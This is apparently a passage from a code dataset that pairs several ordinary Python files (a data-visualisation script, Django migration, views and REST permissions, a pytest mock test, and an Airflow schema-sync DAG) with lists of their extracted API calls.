'constant_op.constant', (['(5)'], {}), '(5)\n', (2772, 2775), False, 'from tensorflow.python.framework import constant_op\n'), ((2817, 2843), 'tensorflow.python.training.training.get_global_step', 'training.get_global_step', ([], {}), '()\n', (2841, 2843), False, 'from tensorflow.python.training import training\n'), ((4110, 4133), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(7)'], {}), '(7)\n', (4130, 4133), False, 'from tensorflow.python.framework import constant_op\n'), ((4135, 4158), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(9)'], {}), '(9)\n', (4155, 4158), False, 'from tensorflow.python.framework import constant_op\n'), ((4565, 4588), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(7)'], {}), '(7)\n', (4585, 4588), False, 'from tensorflow.python.framework import constant_op\n'), ((4590, 4613), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(9)'], {}), '(9)\n', (4610, 4613), False, 'from tensorflow.python.framework import constant_op\n'), ((4936, 4959), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(3)'], {}), '(3)\n', (4956, 4959), False, 'from tensorflow.python.framework import constant_op\n'), ((4961, 4984), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (4981, 4984), False, 'from tensorflow.python.framework import constant_op\n'), ((8984, 9030), 'tensorflow.python.ops.string_ops.string_join', 'string_ops.string_join', (['[concat, concat2]', '""":"""'], {}), "([concat, concat2], ':')\n", (9006, 9030), False, 'from tensorflow.python.ops import string_ops\n'), ((9055, 9080), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['[1]'], {}), '([1])\n', (9075, 9080), False, 'from tensorflow.python.framework import constant_op\n'), ((9524, 9549), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', 
(['"""1"""'], {}), "('1')\n", (9544, 9549), False, 'from tensorflow.python.framework import constant_op\n'), ((9551, 9576), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['"""2"""'], {}), "('2')\n", (9571, 9576), False, 'from tensorflow.python.framework import constant_op\n'), ((2225, 2248), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (2245, 2248), False, 'from tensorflow.python.framework import constant_op\n'), ((6622, 6645), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (6642, 6645), False, 'from tensorflow.python.framework import constant_op\n'), ((9768, 9793), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['"""3"""'], {}), "('3')\n", (9788, 9793), False, 'from tensorflow.python.framework import constant_op\n'), ((2439, 2462), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (2459, 2462), False, 'from tensorflow.python.framework import constant_op\n'), ((2506, 2532), 'tensorflow.python.training.training.get_global_step', 'training.get_global_step', ([], {}), '()\n', (2530, 2532), False, 'from tensorflow.python.training import training\n'), ((6836, 6859), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(5)'], {}), '(5)\n', (6856, 6859), False, 'from tensorflow.python.framework import constant_op\n'), ((6903, 6929), 'tensorflow.python.training.training.get_global_step', 'training.get_global_step', ([], {}), '()\n', (6927, 6929), False, 'from tensorflow.python.training import training\n'), ((9983, 10008), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['"""4"""'], {}), "('4')\n", (10003, 10008), False, 'from tensorflow.python.framework import constant_op\n'), ((10010, 10035), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['"""5"""'], {}), "('5')\n", 
(10030, 10035), False, 'from tensorflow.python.framework import constant_op\n')]
|
'''
Created on 10-Jul-2018
@author: <NAME>
'''
# Seaborn produces the statistical plots; matplotlib renders them on screen.
import seaborn as sns
import matplotlib.pyplot as plt
sns.set(color_codes=True)
# pandas manages the tabular data set; numpy supplies numeric helpers.
import pandas as pd
import numpy as np
# --- Load the pre-processed bank-marketing data set --------------------------
file_name = 'bank_data_test.csv'
data = pd.read_csv(file_name, delimiter=',')
# Report the data-set dimensions (rows x columns).
print('Number of Instances: %d\nNumber of attributes: %d'%(data.shape[0],data.shape[1]))
'''
Number of Instances: 41188
Number of attributes: 21
'''
# Quick numeric summary of a few key attributes.
print(data.describe()[['age','duration','campaign','pdays']])
'''
                age      duration      campaign         pdays
count  41188.00000  41188.000000  41188.000000  41188.000000
mean      40.02406    258.285010      2.567593    962.475454
std       10.42125    259.279249      2.770014    186.910907
min       17.00000      0.000000      1.000000      0.000000
25%       32.00000    102.000000      1.000000    999.000000
50%       38.00000    180.000000      2.000000    999.000000
75%       47.00000    319.000000      3.000000    999.000000
max       98.00000   4918.000000     56.000000    999.000000
'''
# --- Class balance -----------------------------------------------------------
# Keep the target column before shuffling the frame.
y = data.y
# Shuffle the rows prior to visualisation.
data = data.reindex(np.random.permutation(data.index))
# Count plot of the two output classes.
ax = sns.countplot(y, label="Count")
# value_counts() is sorted descending, so "no" (majority) comes first.
no_count, yes_count = y.value_counts()
print('Number of to be subscriber: ', yes_count)
print('Number of not to be subscriber : ', no_count)
'''
Number of to be subscriber:  36548
Number of not to be subscriber :  4640
'''
plt.show()
# --- Distribution plots, laid out on a 2 x 2 grid ----------------------------
f, axes = plt.subplots(nrows=2, ncols=2, figsize=(15, 6))
# (grid position, column, colour, title, x-axis label) for each panel.
panels = [
    ((0, 0), 'month_integer', "#ff3300",
     'Months of Marketing Activity Distribution', 'Months'),
    ((0, 1), 'age', "#3366ff",
     'Age of Potentical Clients Distribution', 'Age'),
    ((1, 0), 'campaign', "#546E7A",
     'Calls Received in the Marketing Campaign', 'Campaign'),
    ((1, 1), 'job', "#33ff66",
     'Potential clients on Job basis', 'Job Type'),
]
for (row, col), column, colour, title, x_label in panels:
    panel = axes[row][col]
    sns.distplot(data[column], kde=False, color=colour, ax=panel).set_title(title)
    panel.set_ylabel('Potential Clients Count')
    panel.set_xlabel(x_label)
plt.show()
# --- Feature correlation -----------------------------------------------------
# x keeps every column (including the target y).
x = data
y = data.y
f, ax = plt.subplots(figsize=(15, 15))
# Annotated heat map of pairwise correlations.
sns.heatmap(x.corr(), annot=True, linewidths=.5, fmt='.1f', ax=ax)
corr = x.corr()
plt.show()
# --- Remove highly correlated (redundant) features ---------------------------
drop_list = ['emp.var.rate', 'nr.employed', 'cons.price.idx', 'euribor3m', 'previous']
data = x.drop(drop_list, axis=1)
print(data.columns)
'''
Index(['age', 'duration', 'campaign', 'pdays', 'cons.conf.idx', 'job',
       'marital', 'education', 'default', 'housing', 'loan', 'contact',
       'day_of_week', 'poutcome', 'y', 'month_integer'],
      dtype='object')
'''
# Persist the reduced feature set for the next pipeline stage.
data.to_csv('bank_data_feat_select_test.csv')
|
[
"matplotlib.pyplot.show",
"pandas.read_csv",
"matplotlib.pyplot.subplots",
"seaborn.countplot",
"seaborn.distplot",
"numpy.random.permutation",
"seaborn.set"
] |
[((187, 212), 'seaborn.set', 'sns.set', ([], {'color_codes': '(True)'}), '(color_codes=True)\n', (194, 212), True, 'import seaborn as sns\n'), ((493, 530), 'pandas.read_csv', 'pd.read_csv', (['file_name'], {'delimiter': '""","""'}), "(file_name, delimiter=',')\n", (504, 530), True, 'import pandas as pd\n'), ((1634, 1665), 'seaborn.countplot', 'sns.countplot', (['y'], {'label': '"""Count"""'}), "(y, label='Count')\n", (1647, 1665), True, 'import seaborn as sns\n'), ((1901, 1911), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1909, 1911), True, 'import matplotlib.pyplot as plt\n'), ((1961, 2008), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(2)', 'ncols': '(2)', 'figsize': '(15, 6)'}), '(nrows=2, ncols=2, figsize=(15, 6))\n', (1973, 2008), True, 'import matplotlib.pyplot as plt\n'), ((2966, 2976), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2974, 2976), True, 'import matplotlib.pyplot as plt\n'), ((3156, 3186), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(15, 15)'}), '(figsize=(15, 15))\n', (3168, 3186), True, 'import matplotlib.pyplot as plt\n'), ((3336, 3346), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3344, 3346), True, 'import matplotlib.pyplot as plt\n'), ((1529, 1562), 'numpy.random.permutation', 'np.random.permutation', (['data.index'], {}), '(data.index)\n', (1550, 1562), True, 'import numpy as np\n'), ((2038, 2116), 'seaborn.distplot', 'sns.distplot', (["data['month_integer']"], {'kde': '(False)', 'color': '"""#ff3300"""', 'ax': 'axes[0][0]'}), "(data['month_integer'], kde=False, color='#ff3300', ax=axes[0][0])\n", (2050, 2116), True, 'import seaborn as sns\n'), ((2290, 2358), 'seaborn.distplot', 'sns.distplot', (["data['age']"], {'kde': '(False)', 'color': '"""#3366ff"""', 'ax': 'axes[0][1]'}), "(data['age'], kde=False, color='#3366ff', ax=axes[0][1])\n", (2302, 2358), True, 'import seaborn as sns\n'), ((2526, 2599), 'seaborn.distplot', 'sns.distplot', (["data['campaign']"], {'kde': 
'(False)', 'color': '"""#546E7A"""', 'ax': 'axes[1][0]'}), "(data['campaign'], kde=False, color='#546E7A', ax=axes[1][0])\n", (2538, 2599), True, 'import seaborn as sns\n'), ((2745, 2813), 'seaborn.distplot', 'sns.distplot', (["data['job']"], {'kde': '(False)', 'color': '"""#33ff66"""', 'ax': 'axes[1][1]'}), "(data['job'], kde=False, color='#33ff66', ax=axes[1][1])\n", (2757, 2813), True, 'import seaborn as sns\n')]
|
# Generated by Django 2.2.2 on 2019-09-25 07:09
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django 2.2.2 migration (2019-09-25): alters three fields
    # on the sensors app's cameradata / wearabledata models.
    # NOTE: Django compares migrations by the deconstructed field arguments,
    # so the definitions below must stay exactly in sync with models.py.
    dependencies = [
        # Must be applied after the previous sensors migration.
        ('sensors', '0003_auto_20190924_2227'),
    ]
    operations = [
        migrations.AlterField(
            model_name='cameradata',
            name='filename',
            # Camera recordings are stored under MEDIA_ROOT/camera/.
            field=models.FileField(help_text='Camera video file', upload_to='camera/'),
        ),
        migrations.AlterField(
            model_name='cameradata',
            name='framerate',
            # NOTE(review): the stored choice *values* are strings while the
            # human-readable labels are numbers — confirm this inversion is
            # intentional in models.py.
            field=models.CharField(choices=[('NTSC_Film', 23.98), ('Film', 24), ('PAL', 25), ('NTSC', 29.97), ('Web', 30), ('PAL_HD', 50), ('NTSC_HD', 59.94), ('High', 60)], default='Film', help_text='Video framerate', max_length=9),
        ),
        migrations.AlterField(
            model_name='wearabledata',
            name='filename',
            # Wearable sensor dumps are stored under MEDIA_ROOT/wearable/.
            field=models.FileField(help_text='Wearable data file', upload_to='wearable/'),
        ),
    ]
|
[
"django.db.models.FileField",
"django.db.models.CharField"
] |
[((342, 410), 'django.db.models.FileField', 'models.FileField', ([], {'help_text': '"""Camera video file"""', 'upload_to': '"""camera/"""'}), "(help_text='Camera video file', upload_to='camera/')\n", (358, 410), False, 'from django.db import migrations, models\n'), ((539, 762), 'django.db.models.CharField', 'models.CharField', ([], {'choices': "[('NTSC_Film', 23.98), ('Film', 24), ('PAL', 25), ('NTSC', 29.97), ('Web', \n 30), ('PAL_HD', 50), ('NTSC_HD', 59.94), ('High', 60)]", 'default': '"""Film"""', 'help_text': '"""Video framerate"""', 'max_length': '(9)'}), "(choices=[('NTSC_Film', 23.98), ('Film', 24), ('PAL', 25),\n ('NTSC', 29.97), ('Web', 30), ('PAL_HD', 50), ('NTSC_HD', 59.94), (\n 'High', 60)], default='Film', help_text='Video framerate', max_length=9)\n", (555, 762), False, 'from django.db import migrations, models\n'), ((883, 954), 'django.db.models.FileField', 'models.FileField', ([], {'help_text': '"""Wearable data file"""', 'upload_to': '"""wearable/"""'}), "(help_text='Wearable data file', upload_to='wearable/')\n", (899, 954), False, 'from django.db import migrations, models\n')]
|
from django.shortcuts import render,redirect
from .forms import OrganizationRegisterForm,CreateEventForm,AddImageForm,AddOrgImage
from .models import Organization,OrganizationImages
from django.contrib.auth.models import User
from django.contrib import messages
from evelist.models import Event,EventImages
from volunteer.models import City,Volunteer
from django.db.models import F
# Create your views here.
def signup(request):
    """Register a new organization: create the auth user via the form, then
    attach an Organization profile built from the remaining cleaned fields.

    GET renders an empty form; an invalid POST re-renders the bound form so
    validation errors are shown; a valid POST redirects back to 'register'.
    """
    if request.method != 'POST':
        # Plain page visit: show a blank registration form.
        return render(request, 'organization/signup.html',
                      {'form': OrganizationRegisterForm()})
    form = OrganizationRegisterForm(request.POST)
    if form.is_valid():
        # The form's save() creates the underlying auth User.
        form.save()
        username = form.cleaned_data.get('username')
        linked_user = User.objects.filter(username=username).first()
        # Build the one-to-one Organization profile for the new user.
        profile = Organization(
            user=linked_user,
            name=form.cleaned_data.get('name'),
            vision=form.cleaned_data.get('vision'),
            mission=form.cleaned_data.get('mission'),
            link=form.cleaned_data.get('link'),
        )
        profile.save()
        messages.success(request, f'Account created for {username}!')
        return redirect('register')
    # Invalid submission: the bound form carries the error messages.
    return render(request, 'organization/signup.html', {'form': form})
def cenv(request):
    """Create a new Event owned by the logged-in user's organization.

    A valid POST saves the event and redirects to the image-upload page;
    otherwise the (possibly bound, error-carrying) form is rendered.
    """
    if request.method == 'POST':
        event_form = CreateEventForm(request.POST, request.FILES)
        if event_form.is_valid():
            # Defer the save so the organizer can be filled in first.
            event = event_form.save(commit=False)
            event.organizer = request.user.organization
            event.save()
            return redirect('add_img')
        # Fall through: re-render the bound form with its validation errors.
    else:
        event_form = CreateEventForm()
    return render(request, 'organization/cenv.html', {'form': event_form})
def aenv(request):
    """List every event organized by the current user's organization."""
    own_events = Event.objects.filter(organizer=request.user.organization)
    return render(request, 'organization/aenv.html', {"events": own_events})
def changep(request):
    """Upload a new profile image for the logged-in organization.

    A valid POST stores the image and redirects back to 'change_profile';
    otherwise the (possibly bound) form is rendered again.
    """
    if request.method == 'POST':
        image_form = AddOrgImage(request.POST, request.FILES)
        if image_form.is_valid():
            # Defer the save so the owning organization can be attached.
            org_image = image_form.save(commit=False)
            org_image.organization = request.user.organization
            org_image.save()
            return redirect('change_profile')
        # Fall through: re-render the bound form with its validation errors.
    else:
        image_form = AddOrgImage()
    return render(request, 'organization/changep.html', {'form': image_form})
def a_image(request):
    """Attach an uploaded image via AddImageForm.

    A valid POST saves the image and redirects to 'add_img'; otherwise the
    (possibly bound) form is rendered again.
    """
    if request.method == 'POST':
        image_form = AddImageForm(request.POST, request.FILES)
        if image_form.is_valid():
            image_form.save()
            return redirect('add_img')
        # Fall through: re-render the bound form with its validation errors.
    else:
        image_form = AddImageForm()
    return render(request, 'organization/a_image.html', {'form': image_form})
def printo(request):
    """Render the public profile page of the organization named in the
    ``org`` query parameter.

    Bug fix: ``context`` used to be created only inside the GET branch, so
    any other HTTP method crashed with ``NameError``; it now defaults to an
    empty dict. A lookup for an unknown organization no longer raises
    ``AttributeError`` either — the template just renders without data.
    """
    context = {}
    if request.method == 'GET':
        org = Organization.objects.filter(name=request.GET.get('org')).first()
        if org is not None:
            context = {
                "name": org.name,
                "vision": org.vision,
                "mission": org.mission,
                "link": org.link,
                # Gallery images attached to this organization.
                "img": OrganizationImages.objects.filter(organization=org),
            }
    return render(request, 'organization/orgview.html', context)
def v_name(request):
    """List the volunteers registered for the event named in the ``event``
    query parameter.

    Bug fix: ``context`` used to be defined only for GET requests, so any
    other HTTP method crashed with ``NameError``; it now defaults to empty.
    """
    context = {}
    if request.method == 'GET':
        event = request.GET.get('event')
        # Event.objects.get still raises DoesNotExist for an unknown name
        # (behavior unchanged for existing callers).
        context = {'volunname': Event.objects.get(name=event).volunteers.all()}
    return render(request, 'organization/vname.html', context)
def upvote(request):
    """Record an upvote for the volunteer named in the ``volunteer`` query
    parameter, then send the user back to the event list.

    Bug fix: the redirect used to live inside the GET branch, so any other
    HTTP method made the view return ``None`` (a server error in Django);
    the response is now returned unconditionally.
    """
    if request.method == 'GET':
        volun = request.GET.get('volunteer')
        c_user = User.objects.filter(username=volun).first()
        # F('upvote') + 1 performs the increment atomically in the database.
        Volunteer.objects.filter(user=c_user).update(upvote=F('upvote')+1)
        messages.success(request, f'successfully upvoted for {c_user}!')
    return redirect('all_event')
|
[
"django.shortcuts.redirect",
"volunteer.models.Volunteer.objects.filter",
"django.contrib.auth.models.User.objects.filter",
"django.db.models.F",
"evelist.models.Event.objects.filter",
"evelist.models.Event.objects.get",
"django.shortcuts.render",
"django.contrib.messages.success"
] |
[((1075, 1134), 'django.shortcuts.render', 'render', (['request', '"""organization/signup.html"""', "{'form': form}"], {}), "(request, 'organization/signup.html', {'form': form})\n", (1081, 1134), False, 'from django.shortcuts import render, redirect\n'), ((1438, 1496), 'django.shortcuts.render', 'render', (['request', '"""organization/cenv.html"""', "{'form': form1}"], {}), "(request, 'organization/cenv.html', {'form': form1})\n", (1444, 1496), False, 'from django.shortcuts import render, redirect\n'), ((1568, 1614), 'evelist.models.Event.objects.filter', 'Event.objects.filter', ([], {'organizer': 'c_organization'}), '(organizer=c_organization)\n', (1588, 1614), False, 'from evelist.models import Event, EventImages\n'), ((1658, 1708), 'django.shortcuts.render', 'render', (['request', '"""organization/aenv.html"""', 'context'], {}), "(request, 'organization/aenv.html', context)\n", (1664, 1708), False, 'from django.shortcuts import render, redirect\n'), ((2009, 2070), 'django.shortcuts.render', 'render', (['request', '"""organization/changep.html"""', "{'form': form2}"], {}), "(request, 'organization/changep.html', {'form': form2})\n", (2015, 2070), False, 'from django.shortcuts import render, redirect\n'), ((2278, 2339), 'django.shortcuts.render', 'render', (['request', '"""organization/a_image.html"""', "{'form': form2}"], {}), "(request, 'organization/a_image.html', {'form': form2})\n", (2284, 2339), False, 'from django.shortcuts import render, redirect\n'), ((2668, 2721), 'django.shortcuts.render', 'render', (['request', '"""organization/orgview.html"""', 'context'], {}), "(request, 'organization/orgview.html', context)\n", (2674, 2721), False, 'from django.shortcuts import render, redirect\n'), ((2899, 2950), 'django.shortcuts.render', 'render', (['request', '"""organization/vname.html"""', 'context'], {}), "(request, 'organization/vname.html', context)\n", (2905, 2950), False, 'from django.shortcuts import render, redirect\n'), ((3240, 3261), 
'django.shortcuts.redirect', 'redirect', (['"""all_event"""'], {}), "('all_event')\n", (3248, 3261), False, 'from django.shortcuts import render, redirect\n'), ((3167, 3231), 'django.contrib.messages.success', 'messages.success', (['request', 'f"""successfully upvoted for {c_user}!"""'], {}), "(request, f'successfully upvoted for {c_user}!')\n", (3183, 3231), False, 'from django.contrib import messages\n'), ((930, 991), 'django.contrib.messages.success', 'messages.success', (['request', 'f"""Account created for {username}!"""'], {}), "(request, f'Account created for {username}!')\n", (946, 991), False, 'from django.contrib import messages\n'), ((1002, 1022), 'django.shortcuts.redirect', 'redirect', (['"""register"""'], {}), "('register')\n", (1010, 1022), False, 'from django.shortcuts import render, redirect\n'), ((1377, 1396), 'django.shortcuts.redirect', 'redirect', (['"""add_img"""'], {}), "('add_img')\n", (1385, 1396), False, 'from django.shortcuts import render, redirect\n'), ((1945, 1971), 'django.shortcuts.redirect', 'redirect', (['"""change_profile"""'], {}), "('change_profile')\n", (1953, 1971), False, 'from django.shortcuts import render, redirect\n'), ((2220, 2239), 'django.shortcuts.redirect', 'redirect', (['"""add_img"""'], {}), "('add_img')\n", (2228, 2239), False, 'from django.shortcuts import render, redirect\n'), ((3046, 3081), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'username': 'volun'}), '(username=volun)\n', (3065, 3081), False, 'from django.contrib.auth.models import User\n'), ((3098, 3135), 'volunteer.models.Volunteer.objects.filter', 'Volunteer.objects.filter', ([], {'user': 'c_user'}), '(user=c_user)\n', (3122, 3135), False, 'from volunteer.models import City, Volunteer\n'), ((779, 817), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'username': 'username'}), '(username=username)\n', (798, 817), False, 'from django.contrib.auth.models import User\n'), ((2810, 2839), 
'evelist.models.Event.objects.get', 'Event.objects.get', ([], {'name': 'event'}), '(name=event)\n', (2827, 2839), False, 'from evelist.models import Event, EventImages\n'), ((3150, 3161), 'django.db.models.F', 'F', (['"""upvote"""'], {}), "('upvote')\n", (3151, 3161), False, 'from django.db.models import F\n')]
|
from django.conf import settings
from django.shortcuts import get_object_or_404
from rest_framework.permissions import BasePermission
from rest_framework.exceptions import PermissionDenied
from mkt.comm.models import (CommunicationNote, CommunicationThread,
user_has_perm_note, user_has_perm_thread)
class ThreadPermission(BasePermission):
    """
    Permission wrapper for checking if the authenticated user has the
    permission to view the thread.
    """

    def has_permission(self, request, view):
        # Single-object retrieval is authorised per-object in
        # has_object_permission instead.
        if view.action == 'retrieve':
            return True
        if request.user.is_authenticated():
            return True
        raise PermissionDenied()

    def has_object_permission(self, request, view, obj):
        """
        Make sure we give correct permissions to read/write the thread.
        """
        # Authenticated users on a non-public thread need an explicit grant;
        # everyone else is governed purely by the thread's public flag.
        if request.user.is_authenticated() and not obj.read_permission_public:
            return user_has_perm_thread(obj, request.user)
        return obj.read_permission_public
class NotePermission(ThreadPermission):
    """Note access is governed by the enclosing thread's permissions plus a
    note-level check."""

    def has_permission(self, request, view):
        # Resolve the thread id either directly from the URL or via the note.
        thread_id = view.kwargs.get('thread_id')
        if not thread_id and view.kwargs.get('note_id'):
            thread_id = CommunicationNote.objects.get(
                id=view.kwargs['note_id']).thread_id
        # Stash the thread on the view so later handlers can reuse it.
        view.comm_thread = get_object_or_404(
            CommunicationThread, id=thread_id)
        return ThreadPermission.has_object_permission(
            self, request, view, view.comm_thread)

    def has_object_permission(self, request, view, obj):
        # Thread-level access was already verified; add the note-level check.
        return user_has_perm_note(obj, request.user)
class AttachmentPermission(NotePermission):
    """Attachments inherit the permissions of the note they belong to."""

    def _note_from_view(self, view):
        # Both hooks below judge access on the parent note; fetch it in one
        # place instead of duplicating the query expression.
        return CommunicationNote.objects.get(id=view.kwargs['note_id'])

    def has_permission(self, request, view):
        note = self._note_from_view(view)
        return NotePermission.has_object_permission(self, request, view, note)

    def has_object_permission(self, request, view, obj):
        # Permission is evaluated on the note, not the attachment object.
        note = self._note_from_view(view)
        return NotePermission.has_object_permission(self, request, view, note)
class EmailCreationPermission(object):
    """Permit if client's IP address is allowed."""

    def has_permission(self, request, view):
        token = request.META.get('HTTP_POSTFIX_AUTH_TOKEN')
        # The token is only validated when the header is present.
        # NOTE(review): a request *without* the header falls through to the
        # IP check alone — confirm that is intentional.
        if token and token not in settings.POSTFIX_AUTH_TOKEN:
            return False
        client_ip = request.META.get('REMOTE_ADDR')
        # Truthy only when the client IP is on the allow list.
        return client_ip and (
            client_ip in settings.ALLOWED_CLIENTS_EMAIL_API)
|
[
"rest_framework.exceptions.PermissionDenied",
"django.shortcuts.get_object_or_404",
"mkt.comm.models.user_has_perm_note",
"mkt.comm.models.CommunicationNote.objects.get",
"mkt.comm.models.user_has_perm_thread"
] |
[((1101, 1140), 'mkt.comm.models.user_has_perm_thread', 'user_has_perm_thread', (['obj', 'request.user'], {}), '(obj, request.user)\n', (1121, 1140), False, 'from mkt.comm.models import CommunicationNote, CommunicationThread, user_has_perm_note, user_has_perm_thread\n'), ((1550, 1602), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['CommunicationThread'], {'id': 'thread_id'}), '(CommunicationThread, id=thread_id)\n', (1567, 1602), False, 'from django.shortcuts import get_object_or_404\n'), ((1869, 1906), 'mkt.comm.models.user_has_perm_note', 'user_has_perm_note', (['obj', 'request.user'], {}), '(obj, request.user)\n', (1887, 1906), False, 'from mkt.comm.models import CommunicationNote, CommunicationThread, user_has_perm_note, user_has_perm_thread\n'), ((2014, 2070), 'mkt.comm.models.CommunicationNote.objects.get', 'CommunicationNote.objects.get', ([], {'id': "view.kwargs['note_id']"}), "(id=view.kwargs['note_id'])\n", (2043, 2070), False, 'from mkt.comm.models import CommunicationNote, CommunicationThread, user_has_perm_note, user_has_perm_thread\n'), ((2296, 2352), 'mkt.comm.models.CommunicationNote.objects.get', 'CommunicationNote.objects.get', ([], {'id': "view.kwargs['note_id']"}), "(id=view.kwargs['note_id'])\n", (2325, 2352), False, 'from mkt.comm.models import CommunicationNote, CommunicationThread, user_has_perm_note, user_has_perm_thread\n'), ((767, 785), 'rest_framework.exceptions.PermissionDenied', 'PermissionDenied', ([], {}), '()\n', (783, 785), False, 'from rest_framework.exceptions import PermissionDenied\n'), ((1354, 1410), 'mkt.comm.models.CommunicationNote.objects.get', 'CommunicationNote.objects.get', ([], {'id': "view.kwargs['note_id']"}), "(id=view.kwargs['note_id'])\n", (1383, 1410), False, 'from mkt.comm.models import CommunicationNote, CommunicationThread, user_has_perm_note, user_has_perm_thread\n')]
|
import pytest as pytest
from unittest.mock import Mock
from marginTrading import github_api
@pytest.fixture
def avatar_url(mocker):
    """Patch requests.get inside github_api and return the canned avatar URL."""
    url = 'https://avatars.githubusercontent.com/u/78605825?v=4'
    fake_response = Mock()
    # The fake payload mirrors GitHub's /users/<login> response shape.
    fake_response.json.return_value = {
        'login': 'sambiase',
        'id': 78605825,
        'node_id': 'MDQ6VXNlcjc4NjA1ODI1',
        'avatar_url': url,
    }
    mocker.patch('marginTrading.github_api.requests.get',
                 return_value=fake_response)
    return url
def teste_buscar_avatar(avatar_url):
    """Unit test: buscar_avatar must return the URL served by the mocked API."""
    assert github_api.buscar_avatar('sambiase') == avatar_url
def teste_buscar_avatar_integracao():
    """Integration test: hits the live GitHub API (requires network access)."""
    resultado = github_api.buscar_avatar('sambiase')
    assert 'https://avatars.githubusercontent.com/u/78605825?v=4' == resultado
|
[
"marginTrading.github_api.buscar_avatar",
"unittest.mock.Mock"
] |
[((151, 157), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (155, 157), False, 'from unittest.mock import Mock\n'), ((556, 592), 'marginTrading.github_api.buscar_avatar', 'github_api.buscar_avatar', (['"""sambiase"""'], {}), "('sambiase')\n", (580, 592), False, 'from marginTrading import github_api\n'), ((672, 708), 'marginTrading.github_api.buscar_avatar', 'github_api.buscar_avatar', (['"""sambiase"""'], {}), "('sambiase')\n", (696, 708), False, 'from marginTrading import github_api\n')]
|
# General imports
import importlib as il
import os
import sys
# Partial imports
from airflow.operators.python import PythonOperator
from airflow.models import Variable
from airflow import DAG
from airflow.utils.db import create_session
from datetime import datetime, timedelta
from typing import List
# Import from cornflow environment
from cornflow_client import ApplicationCore
# Task-level defaults applied to every task created with these args.
default_args = {
    "owner": "baobab",
    "depends_on_past": False,
    "start_date": datetime(2020, 2, 1),
    "email": [""],
    "email_on_failure": False,
    "email_on_retry": False,
    # NOTE(review): retries=-1 — Airflow expects a non-negative retry count;
    # confirm whether "retry forever" was the intent here.
    "retries": -1,
    "retry_delay": timedelta(minutes=1),
    # NOTE(review): "schedule_interval" and "catchup" are DAG-level settings;
    # placing them in default_args (which feeds tasks) has no effect.
    "schedule_interval": "@hourly",
    "catchup": False,
}
# Attribute names collected from each app's dag module (see get_schemas_dag_file).
schemas = ["instance", "solution", "config"]
def get_new_apps() -> List[ApplicationCore]:
    """Instantiate every ApplicationCore subclass shipped in this folder."""
    # Importing the dag modules is what registers the subclasses.
    import_dags()
    return [subclass() for subclass in ApplicationCore.__subclasses__()]
def import_dags():
    """Import every candidate Python module in this directory so that the app
    classes register themselves as ApplicationCore subclasses.

    Fixes: sys.path is no longer grown with duplicate entries on repeated
    calls, and import failures are logged instead of silently swallowed
    (the best-effort behavior — skip broken modules — is preserved).
    """
    app_dir = os.path.dirname(__file__)
    if app_dir not in sys.path:
        # Only append once; this function may run on every scheduler tick.
        sys.path.append(app_dir)
    print("looking for apps in dir={}".format(app_dir))
    files = os.listdir(app_dir)
    print("Files are: {}".format(files))
    # Try each file that matches the filters; skip this module itself.
    for dag_module in files:
        filename, ext = os.path.splitext(dag_module)
        if ext not in [".py", ""] or filename == "activate_apps":
            continue
        try:
            _import_file(filename)
        except Exception as err:
            # A broken module must not block the other apps, but leave a
            # trace instead of failing silently.
            print("could not import {}: {}".format(filename, err))
            continue
def _import_file(filename):
return il.import_module(filename)
def get_schemas_dag_file(_module):
    """Collect the schema attributes (instance/solution/config) from a module."""
    return {name: getattr(_module, name) for name in schemas}
def get_all_schemas():
    """Return ``{app_name: schemas}`` for every app discovered in this folder.

    Bug fix: the discovery result used to be logged twice — the second line
    even claimed apps were "Found" when the list was empty. It is now logged
    exactly once, with an explicit message for the empty case.
    """
    apps = get_new_apps()
    if apps:
        print("Found the following apps: {}".format([app.name for app in apps]))
    else:
        print("No apps were found to update")
    return {app.name: app.get_schemas() for app in apps}
def update_schemas(**kwargs):
    """Push every app's schemas into Airflow Variables and drop stale ones."""
    found = get_all_schemas()
    # Upsert one serialized Variable per discovered app.
    for app_name, app_schemas in found.items():
        Variable.set(key=app_name, value=app_schemas, serialize_json=True)
    # Then remove Variables belonging to apps that no longer exist.
    with create_session() as session:
        existing = {row.key for row in session.query(Variable)}
        stale = existing - found.keys()
        print("About to delete old apps: {}".format(stale))
        for key in stale:
            Variable.delete(key, session)
# DAG that refreshes the schema Variables for all deployed apps.
# catchup=False: do not backfill runs for past schedule intervals.
dag = DAG(
    "update_all_schemas", default_args=default_args, catchup=False, tags=["internal"]
)
# Single task: scan this folder for apps and sync their schemas.
# NOTE(review): provide_context=True is deprecated/no-op on Airflow 2.x.
update_schema2 = PythonOperator(
    task_id="update_all_schemas",
    provide_context=True,
    python_callable=update_schemas,
    dag=dag,
)
# Allow running the sync directly (outside the scheduler) for debugging.
if __name__ == "__main__":
    update_schemas()
|
[
"airflow.utils.db.create_session",
"airflow.DAG",
"airflow.operators.python.PythonOperator",
"importlib.import_module",
"os.path.dirname",
"datetime.datetime",
